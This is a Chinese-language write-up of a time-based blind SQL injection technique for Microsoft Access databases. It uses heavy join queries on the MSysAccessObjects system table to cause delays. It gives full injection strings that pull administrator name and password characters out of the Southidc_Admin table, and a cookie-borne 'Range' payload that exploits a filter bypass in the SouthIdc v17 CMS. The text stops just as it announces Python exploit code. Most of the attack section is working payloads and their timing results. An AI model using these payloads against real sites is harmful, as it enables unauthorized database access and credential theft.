Access數(shù)據(jù)庫基于時(shí)間sql盲注的完成記錄

 　　Access是微軟把數(shù)據(jù)庫引擎的圖形用戶界面和軟件開發(fā)工具結(jié)合在一起的一個(gè)數(shù)據(jù)庫管理系統(tǒng)。本文我們來看看Access數(shù)據(jù)庫基于時(shí)間sql盲注的實(shí)現(xiàn)記錄。

　　概述

　　眾所周知，access數(shù)據(jù)庫是不支持基于時(shí)間的盲注方式，但是我們可以利用access的系統(tǒng)表MSysAccessObjects，通過多負(fù)荷查詢(Heavy Queries)的方式實(shí)現(xiàn)。

　　初步探究

　　我們以SouthIdcv17數(shù)據(jù)庫為例

　　執(zhí)行 select * from Southidc_About ，返回結(jié)果如下圖。

　　如何實(shí)現(xiàn)time base injection 呢?我們就要利用這條語句

　　SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

　　具體實(shí)現(xiàn)方式如下：

　　select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

　　Southidc_Admin)=97

　　我們可以執(zhí)行一次，觀察效果。

　　很明顯，經(jīng)歷了大約40s才返回結(jié)果

　　當(dāng)我們執(zhí)行如下語句時(shí),也就是把最后的97改為96

　　select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

　　Southidc_Admin)=96

　　很快就執(zhí)行完畢，沒有延時(shí)。

　　很明顯，我們通過where條件后的

　　(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

　　MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

　　實(shí)現(xiàn)了延時(shí)，但需要注意的是這里where后的條件是有順序的，實(shí)現(xiàn)延時(shí)的語句必須在

　　1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

　　之前，為什么呢?實(shí)驗(yàn)得出的結(jié)論。

　　實(shí)例實(shí)現(xiàn)

　　在SouthIdc 17 中，有一處sql注入漏洞，但是常規(guī)的方法并不能成功利用漏洞。漏洞代碼如下：

　　雖然程序把Post和Get的數(shù)據(jù)進(jìn)行了過濾，但是我們依舊我可以通過Cookie的提交方式進(jìn)行注入。

　　好，我們實(shí)現(xiàn)一下注入利用。

　　我們需要注入的語句為：

　　select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

　　通過提交cookie

　　Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

　　ParentID為程序上部傳進(jìn)的值，最終的語句為：

　　1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

　　我們可以在查詢器中看一下效果

　　96時(shí)，不延時(shí)，如圖:

　　97時(shí)延時(shí)，效果如下圖：

　　接下來，我們可以利用上述語句進(jìn)行exp的編寫，筆者這里用python

　　核心代碼如下：